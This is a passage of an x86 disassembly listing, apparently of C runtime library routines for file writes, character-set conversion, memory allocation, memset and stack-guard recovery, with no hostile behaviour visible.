xor eax, eax
jmp loc_41A953
; ---------------------------------------------------------------------------
loc_41A7E5: ; CODE XREF: sub_41A7BC+20�j
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:47A2E0h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41A818
push 2
push edi
push edi
push [ebp+arg_0]
call sub_41D896
add esp, 10h
loc_41A818: ; CODE XREF: sub_41A7BC+4B�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41A8EA
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov [ebp+var_8], edi
jbe loc_41A925
loc_41A838: ; CODE XREF: sub_41A7BC+F3�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_420]
mov [ebp+var_C], edi
loc_41A847: ; CODE XREF: sub_41A7BC+B5�j
cmp ecx, [ebp+arg_8]
jnb short loc_41A873
mov edx, [ebp+var_10]
inc [ebp+var_10]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41A864
inc [ebp+var_18]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+var_C]
loc_41A864: ; CODE XREF: sub_41A7BC+9C�j
mov [eax], dl
inc eax
inc [ebp+var_C]
cmp [ebp+var_C], 400h
jl short loc_41A847
loc_41A873: ; CODE XREF: sub_41A7BC+8E�j
mov edi, eax
lea eax, [ebp+var_420]
sub edi, eax
push 0
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_420]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_41F038 ; WriteFile
test eax, eax
jz short loc_41A8B3
mov eax, [ebp+var_1C]
add [ebp+var_14], eax
cmp eax, edi
jl short loc_41A8BC
mov eax, [ebp+var_10]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
jb short loc_41A838
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
loc_41A8B3: ; CODE XREF: sub_41A7BC+DC�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
loc_41A8BC: ; CODE XREF: sub_41A7BC+E6�j
xor edi, edi
loc_41A8BE: ; CODE XREF: sub_41A7BC+F5�j
; sub_41A7BC+14E�j ...
mov eax, [ebp+var_14]
cmp eax, edi
jnz loc_41A94E
cmp [ebp+var_8], edi
jz short loc_41A925
push 5
pop esi
cmp [ebp+var_8], esi
jnz short loc_41A917
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
mov [eax], esi
jmp short loc_41A920
; ---------------------------------------------------------------------------
loc_41A8EA: ; CODE XREF: sub_41A7BC+64�j
push edi
lea ecx, [ebp+var_1C]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_41F038 ; WriteFile
test eax, eax
jz short loc_41A90C
mov eax, [ebp+var_1C]
mov [ebp+var_8], edi
mov [ebp+var_14], eax
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
loc_41A90C: ; CODE XREF: sub_41A7BC+143�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
loc_41A917: ; CODE XREF: sub_41A7BC+118�j
push [ebp+var_8]
call sub_417C82
pop ecx
loc_41A920: ; CODE XREF: sub_41A7BC+12C�j
; sub_41A7BC+190�j
or eax, 0FFFFFFFFh
jmp short loc_41A951
; ---------------------------------------------------------------------------
loc_41A925: ; CODE XREF: sub_41A7BC+76�j
; sub_41A7BC+110�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41A93A
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41A93A
xor eax, eax
jmp short loc_41A951
; ---------------------------------------------------------------------------
loc_41A93A: ; CODE XREF: sub_41A7BC+170�j
; sub_41A7BC+178�j
call sub_417C70
mov dword ptr [eax], 1Ch
call sub_417C79
mov [eax], edi
jmp short loc_41A920
; ---------------------------------------------------------------------------
loc_41A94E: ; CODE XREF: sub_41A7BC+107�j
sub eax, [ebp+var_18]
loc_41A951: ; CODE XREF: sub_41A7BC+167�j
; sub_41A7BC+17C�j
pop esi
pop ebx
loc_41A953: ; CODE XREF: sub_41A7BC+24�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
call sub_4182D6
leave
retn
sub_41A7BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A961 proc near ; CODE XREF: sub_414AFC+98�p
; sub_414AFC+EB�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041A9F0 SIZE 0000001C BYTES
push 0Ch
push offset stru_4283E8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_41A9F0
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41A9F0
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41A9C0
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41A7BC
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41A9D7
; ---------------------------------------------------------------------------
loc_41A9C0: ; CODE XREF: sub_41A961+49�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41A9D7: ; CODE XREF: sub_41A961+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A9E8
mov eax, [ebp+var_1C]
jmp short loc_41AA06
sub_41A961 endp
; =============== S U B R O U T I N E =======================================
sub_41A9E5 proc near ; DATA XREF: .rdata:stru_4283E8�o
mov ebx, [ebp+8]
sub_41A9E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A9E8 proc near ; CODE XREF: sub_41A961+7A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_41A9E8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A961
loc_41A9F0: ; CODE XREF: sub_41A961+15�j
; sub_41A961+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41AA06: ; CODE XREF: sub_41A961+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41A961
; =============== S U B R O U T I N E =======================================
sub_41AA0C proc near ; CODE XREF: sub_414AFC+6F�p
; sub_417455+34�p ...
arg_0 = dword ptr 4
inc dword_479EB8
push 1000h
call sub_41344D
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_41AA35
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41AA46
; ---------------------------------------------------------------------------
loc_41AA35: ; CODE XREF: sub_41AA0C+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41AA46: ; CODE XREF: sub_41AA0C+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41AA0C endp
; =============== S U B R O U T I N E =======================================
sub_41AA50 proc near ; CODE XREF: sub_414AFC+64�p
; sub_418FBC+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47A2C8
jb short loc_41AA5F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41AA5F: ; CODE XREF: sub_41AA50+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_41AA50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA7A proc near ; CODE XREF: sub_41AADA+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_41AA8B
xor eax, eax
jmp short loc_41AAD7
; ---------------------------------------------------------------------------
loc_41AA8B: ; CODE XREF: sub_41AA7A+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41AAA4
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_41AAC9
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_41AAD7
; ---------------------------------------------------------------------------
loc_41AAA4: ; CODE XREF: sub_41AA7A+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call ds:dword_41F0AC ; WideCharToMultiByte
cmp eax, esi
jz short loc_41AAC9
cmp [ebp+arg_4], esi
jz short loc_41AAD7
loc_41AAC9: ; CODE XREF: sub_41AA7A+21�j
; sub_41AA7A+48�j
call sub_417C70
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_41AAD7: ; CODE XREF: sub_41AA7A+F�j
; sub_41AA7A+28�j ...
pop esi
pop ebp
retn
sub_41AA7A endp
; =============== S U B R O U T I N E =======================================
sub_41AADA proc near ; CODE XREF: sub_414CA3+317�p
; sub_414CA3+6F7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41AAEF
call sub_41628E
loc_41AAEF: ; CODE XREF: sub_41AADA+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_41AA7A
add esp, 0Ch
retn
sub_41AADA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB01 proc near ; CODE XREF: sub_415456+23�p
; sub_4154C7+29�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041ABB4 SIZE 00000008 BYTES
push 10h
push offset stru_4283F8
call __SEH_prolog
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+var_1C], esi
test esi, esi
jnz short loc_41AB1C
inc esi
loc_41AB1C: ; CODE XREF: sub_41AB01+18�j
; sub_41AB01+9F�j
xor edi, edi
mov [ebp+var_20], edi
cmp esi, 0FFFFFFE0h
ja short loc_41AB8B
cmp dword_47A640, 3
jnz short loc_41AB76
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_1C]
cmp ebx, dword_47A62C
ja short loc_41AB76
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_417159
pop ecx
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41ABAB
mov edi, [ebp+var_20]
test edi, edi
jz short loc_41AB7A
push [ebp+var_1C]
push 0
push edi
call sub_41ADD0
add esp, 0Ch
loc_41AB76: ; CODE XREF: sub_41AB01+2C�j
; sub_41AB01+40�j
test edi, edi
jnz short loc_41ABB4
loc_41AB7A: ; CODE XREF: sub_41AB01+65�j
push esi
push 8
push dword_47A63C
call ds:dword_41F13C ; RtlAllocateHeap
mov edi, eax
loc_41AB8B: ; CODE XREF: sub_41AB01+23�j
test edi, edi
jnz short loc_41ABB4
cmp dword_47A014, edi
jz short loc_41ABB4
push esi
call sub_417AED
pop ecx
test eax, eax
jnz loc_41AB1C
jmp short loc_41ABB6
sub_41AB01 endp
; =============== S U B R O U T I N E =======================================
sub_41ABA8 proc near ; DATA XREF: .rdata:stru_4283F8�o
mov esi, [ebp+0Ch]
sub_41ABA8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41ABAB proc near ; CODE XREF: sub_41AB01+5B�p
push 4
call sub_41686D
pop ecx
retn
sub_41ABAB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AB01
loc_41ABB4: ; CODE XREF: sub_41AB01+77�j
; sub_41AB01+8C�j ...
mov eax, edi
loc_41ABB6: ; CODE XREF: sub_41AB01+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41AB01
; =============== S U B R O U T I N E =======================================
sub_41ABBC proc near ; CODE XREF: sub_41554C+CF�p
; sub_41554C+301�p ...
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41ABD1
call sub_41628E
loc_41ABD1: ; CODE XREF: sub_41ABBC+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41ABE7
push 4
push [esp+4+arg_0]
push eax
call sub_41608B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41ABE7: ; CODE XREF: sub_41ABBC+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41ABBC endp
; =============== S U B R O U T I N E =======================================
sub_41ABF6 proc near ; CODE XREF: sub_41554C+840�p
; sub_41554C+922�p
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41AC0B
call sub_41628E
loc_41AC0B: ; CODE XREF: sub_41ABF6+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41AC24
push 80h
push [esp+4+arg_0]
push eax
call sub_41608B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41AC24: ; CODE XREF: sub_41ABF6+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41ABF6 endp
; =============== S U B R O U T I N E =======================================
sub_41AC35 proc near ; CODE XREF: sub_41554C+3F�p
; sub_41554C+5A�p ...
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41AC4A
call sub_41628E
loc_41AC4A: ; CODE XREF: sub_41AC35+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41AC60
push 8
push [esp+4+arg_0]
push eax
call sub_41608B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41AC60: ; CODE XREF: sub_41AC35+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41AC35 endp
; =============== S U B R O U T I N E =======================================
sub_41AC6F proc near ; CODE XREF: sub_41554C+6D�p
; sub_41554C+3DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41ACBB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41AC8D
test al, al
jns short loc_41ACBB
test al, 2
jnz short loc_41ACBB
loc_41AC8D: ; CODE XREF: sub_41AC6F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41AC9A
push esi
call sub_41AA0C
pop ecx
loc_41AC9A: ; CODE XREF: sub_41AC6F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41ACAA
cmp dword ptr [esi+4], 0
jnz short loc_41ACBB
inc eax
mov [esi], eax
loc_41ACAA: ; CODE XREF: sub_41AC6F+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_41ACC1
cmp [eax], bl
jz short loc_41ACC3
inc eax
mov [esi], eax
loc_41ACBB: ; CODE XREF: sub_41AC6F+9�j
; sub_41AC6F+18�j ...
or eax, 0FFFFFFFFh
loc_41ACBE: ; CODE XREF: sub_41AC6F+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41ACC1: ; CODE XREF: sub_41AC6F+43�j
mov [eax], bl
loc_41ACC3: ; CODE XREF: sub_41AC6F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41ACBE
sub_41AC6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACDB proc near ; CODE XREF: sub_41AD9B+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_41ACFF
cmp [ebp+arg_C], ebx
jz short loc_41ACFF
mov al, [edi]
cmp al, bl
jnz short loc_41AD06
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_41ACFF
mov [eax], bx
loc_41ACFF: ; CODE XREF: sub_41ACDB+D�j
; sub_41ACDB+12�j ...
xor eax, eax
loc_41AD01: ; CODE XREF: sub_41ACDB+44�j
; sub_41ACDB+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AD06: ; CODE XREF: sub_41ACDB+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_41AD21
mov ecx, [ebp+arg_4]
cmp ecx, ebx
jz short loc_41AD1C
movzx ax, al
mov [ecx], ax
loc_41AD1C: ; CODE XREF: sub_41ACDB+38�j
; sub_41ACDB+AB�j
xor eax, eax
inc eax
jmp short loc_41AD01
; ---------------------------------------------------------------------------
loc_41AD21: ; CODE XREF: sub_41ACDB+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41AD6A
mov eax, [esi+28h]
cmp eax, 1
jle short loc_41AD58
cmp [ebp+arg_C], eax
jl short loc_41AD58
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call ds:dword_41F0A8 ; MultiByteToWideChar
test eax, eax
jnz short loc_41AD65
loc_41AD58: ; CODE XREF: sub_41ACDB+59�j
; sub_41ACDB+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_41AD88
cmp [edi+1], bl
jz short loc_41AD88
loc_41AD65: ; CODE XREF: sub_41ACDB+7B�j
mov eax, [esi+28h]
jmp short loc_41AD01
; ---------------------------------------------------------------------------
loc_41AD6A: ; CODE XREF: sub_41ACDB+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call ds:dword_41F0A8 ; MultiByteToWideChar
test eax, eax
jnz short loc_41AD1C
loc_41AD88: ; CODE XREF: sub_41ACDB+83�j
; sub_41ACDB+88�j
call sub_417C70
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41AD01
sub_41ACDB endp
; =============== S U B R O U T I N E =======================================
sub_41AD9B proc near ; CODE XREF: sub_41554C+68F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41ADB0
call sub_41628E
loc_41ADB0: ; CODE XREF: sub_41AD9B+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_41ACDB
add esp, 10h
retn
sub_41AD9B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41ADD0 proc near ; CODE XREF: sub_41554C+512�p
; sub_418035+8C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41AE2B
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41AE1B
neg ecx
and ecx, 3
jz short loc_41ADFD
sub edx, ecx
loc_41ADF3: ; CODE XREF: sub_41ADD0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41ADF3
loc_41ADFD: ; CODE XREF: sub_41ADD0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41AE1B
rep stosd
test edx, edx
jz short loc_41AE25
loc_41AE1B: ; CODE XREF: sub_41ADD0+18�j
; sub_41ADD0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41AE1B
loc_41AE25: ; CODE XREF: sub_41ADD0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41AE2B: ; CODE XREF: sub_41ADD0+A�j
mov eax, [esp+arg_0]
retn
sub_41ADD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE30 proc near ; CODE XREF: sub_41554C+4DC�p
; sub_4182E4+FD�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_412DD0
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_41F1B8 ; VirtualQuery
test eax, eax
jz short loc_41AEC5
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call ds:dword_41F1B4 ; GetSystemInfo
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_479E5C
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_41AEC5
cmp eax, 1
jz short loc_41AEDD
mov ebx, edi
mov edi, 1000h
loc_41AE9A: ; CODE XREF: sub_41AE30+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_41F1B8 ; VirtualQuery
test eax, eax
jz short loc_41AEC5
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_41AE9A
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_41AEC1
xor eax, eax
inc eax
jmp short loc_41AEF9
; ---------------------------------------------------------------------------
loc_41AEC1: ; CODE XREF: sub_41AE30+8A�j
cmp esi, ebx
jnb short loc_41AEC9
loc_41AEC5: ; CODE XREF: sub_41AE30+22�j
; sub_41AE30+5C�j ...
xor eax, eax
jmp short loc_41AEF9
; ---------------------------------------------------------------------------
loc_41AEC9: ; CODE XREF: sub_41AE30+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call ds:dword_41F174 ; VirtualAlloc
mov eax, dword_479E5C
jmp short loc_41AEDF
; ---------------------------------------------------------------------------
loc_41AEDD: ; CODE XREF: sub_41AE30+61�j
mov ebx, esi
loc_41AEDF: ; CODE XREF: sub_41AE30+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call ds:dword_41F1B0 ; VirtualProtect
loc_41AEF9: ; CODE XREF: sub_41AE30+8F�j
; sub_41AE30+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_41AE30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF01 proc near ; CODE XREF: sub_41608B+60�p
; sub_4190C6+A4�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_428408
call __SEH_prolog
xor esi, esi
cmp dword_47A13C, esi
jnz short loc_41AF4C
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_427ECC
push edi
call ds:dword_41F1C0 ; GetStringTypeW
test eax, eax
jz short loc_41AF37
mov dword_47A13C, edi
jmp short loc_41AF4C
; ---------------------------------------------------------------------------
loc_41AF37: ; CODE XREF: sub_41AF01+2C�j
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41AF4C
mov dword_47A13C, 2
loc_41AF4C: ; CODE XREF: sub_41AF01+14�j
; sub_41AF01+34�j ...
mov eax, dword_47A13C
cmp eax, 2
jz loc_41B044
cmp eax, esi
jz loc_41B044
cmp eax, 1
jnz loc_41B06A
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_41AF7E
mov eax, dword_47A188
mov [ebp+arg_10], eax
loc_41AF7E: ; CODE XREF: sub_41AF01+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call ds:dword_41F0A8 ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_41B06A
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_41ADD0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41AFEF
; ---------------------------------------------------------------------------
loc_41AFDA: ; DATA XREF: .rdata:stru_428408�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AFDE: ; DATA XREF: .rdata:stru_428408�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41AFEF: ; CODE XREF: sub_41AF01+D7�j
test esi, esi
jnz short loc_41B00A
push edi
push 2
call sub_41AB01
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_41B06A
mov [ebp+var_24], 1
loc_41B00A: ; CODE XREF: sub_41AF01+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_41F0A8 ; MultiByteToWideChar
test eax, eax
jz short loc_41B032
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_41F1C0 ; GetStringTypeW
mov [ebp+var_20], eax
loc_41B032: ; CODE XREF: sub_41AF01+11E�j
cmp [ebp+var_24], 0
jz short loc_41B03F
push esi
call sub_412FE4
pop ecx
loc_41B03F: ; CODE XREF: sub_41AF01+135�j
mov eax, [ebp+var_20]
jmp short loc_41B0B2
; ---------------------------------------------------------------------------
loc_41B044: ; CODE XREF: sub_41AF01+53�j
; sub_41AF01+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41B051
mov ebx, dword_47A178
loc_41B051: ; CODE XREF: sub_41AF01+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_41B05E
mov edi, dword_47A188
loc_41B05E: ; CODE XREF: sub_41AF01+155�j
push ebx
call sub_41CB47
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41B06E
loc_41B06A: ; CODE XREF: sub_41AF01+64�j
; sub_41AF01+A5�j ...
xor eax, eax
jmp short loc_41B0B2
; ---------------------------------------------------------------------------
loc_41B06E: ; CODE XREF: sub_41AF01+167�j
cmp eax, edi
jz short loc_41B090
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_41CB90
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_41B06A
mov [ebp+arg_4], esi
loc_41B090: ; CODE XREF: sub_41AF01+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call ds:dword_41F1BC ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_41B0B0
push esi
call sub_412FE4
pop ecx
loc_41B0B0: ; CODE XREF: sub_41AF01+1A6�j
mov eax, edi
loc_41B0B2: ; CODE XREF: sub_41AF01+141�j
; sub_41AF01+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41AF01 endp
; =============== S U B R O U T I N E =======================================
sub_41B0BB proc near ; CODE XREF: sub_416102+B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41B249
push dword ptr [esi+4]
call sub_412FE4
push dword ptr [esi+8]
call sub_412FE4
push dword ptr [esi+0Ch]
call sub_412FE4
push dword ptr [esi+10h]
call sub_412FE4
push dword ptr [esi+14h]
call sub_412FE4
push dword ptr [esi+18h]
call sub_412FE4
push dword ptr [esi]
call sub_412FE4
push dword ptr [esi+20h]
call sub_412FE4
push dword ptr [esi+24h]
call sub_412FE4
push dword ptr [esi+28h]
call sub_412FE4
push dword ptr [esi+2Ch]
call sub_412FE4
push dword ptr [esi+30h]
call sub_412FE4
push dword ptr [esi+34h]
call sub_412FE4
push dword ptr [esi+1Ch]
call sub_412FE4
push dword ptr [esi+38h]
call sub_412FE4
